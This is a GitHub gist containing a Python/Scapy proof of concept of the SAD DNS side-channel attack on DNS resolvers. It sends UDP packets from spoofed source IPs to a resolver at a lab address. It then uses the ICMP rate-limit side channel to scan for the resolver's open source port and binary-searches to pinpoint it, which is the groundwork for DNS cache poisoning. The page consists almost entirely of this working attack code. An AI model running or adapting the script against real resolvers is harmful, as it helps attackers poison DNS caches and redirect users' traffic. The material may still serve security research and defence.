Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save WangYihang/edc196131f1d35d53ba63dafa419f1d5 to your computer and use it in GitHub Desktop.
Save WangYihang/edc196131f1d35d53ba63dafa419f1d5 to your computer and use it in GitHub Desktop.
DNS Cache Poisoning Attack Reloaded: Revolutions with Side Channels
# #!/usr/bin/env python
from scapy.all import *
from faker import Faker
class SAD:
def __init__(self, fdns) -> None:
self.start_port = 0x8000
self.end_port = 0x10000
self.socket = conf.L2socket(iface="ens33")
self.icmp_ratelimit = 20
self.fdns = fdns
self.wait_time = 0.005
self.packets_sent = 0
self.bytes_sent = 0
self.faker = Faker()
def scan(self):
for i in range(self.start_port, self.end_port, self.icmp_ratelimit):
time.sleep(self.wait_time)
packets = []
for port in range(i, i+self.icmp_ratelimit):
packets.append(Ether()/IP(src=self.faker.ipv4(),
dst=self.fdns)/UDP(dport=port))
start = time.time()
for p in packets:
self.socket.send(p)
self.packets_sent += 1
self.bytes_sent += len(bytes(p))
end = time.time()
print(i, i + self.icmp_ratelimit, end - start)
if self.wait(): return i
return None
def wait(self):
probe = Ether()/IP(dst=self.fdns)/UDP(dport=1)
reply = self.socket.sr1(probe, timeout=0.02, verbose=False)
if reply != None \
and reply.haslayer(ICMP) \
and reply.getlayer(ICMP).type == 0x03 \
and reply.getlayer(ICMP).code == 0x03:
return True
return False
def generate(self, section_start, l, r):
ports = [i for i in range(
section_start, section_start + self.icmp_ratelimit)]
masks = [True for _ in range(self.icmp_ratelimit)]
mid = int((l + r) / 2)
for i in range(l, mid + 1):
masks[i] = False
packets = []
for i, _ in enumerate(ports):
mask, port = masks[i], ports[i]
dport = 1 if mask else port
packets.append(Ether()/IP(src=self.faker.ipv4(),
dst=self.fdns)/UDP(dport=dport))
return packets
def guess(self, section_start):
l, r = 0, self.icmp_ratelimit - 1
while l < r:
time.sleep(self.wait_time)
m = int((l + r) / 2)
packets = self.generate(section_start, l, r)
for p in packets:
self.socket.send(p)
self.packets_sent += 1
self.bytes_sent += len(bytes(p))
rcvd = self.wait()
print(l, m, r)
if rcvd:
r = m
else:
l = m + 1
port = section_start + l
return port
def mute(self, resolver):
pass
def test():
fdns = "192.168.88.130"
sad = SAD(fdns=fdns)
section_start = sad.scan()
port = sad.guess(section_start=section_start)
print(port)
if __name__ == "__main__":
test()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment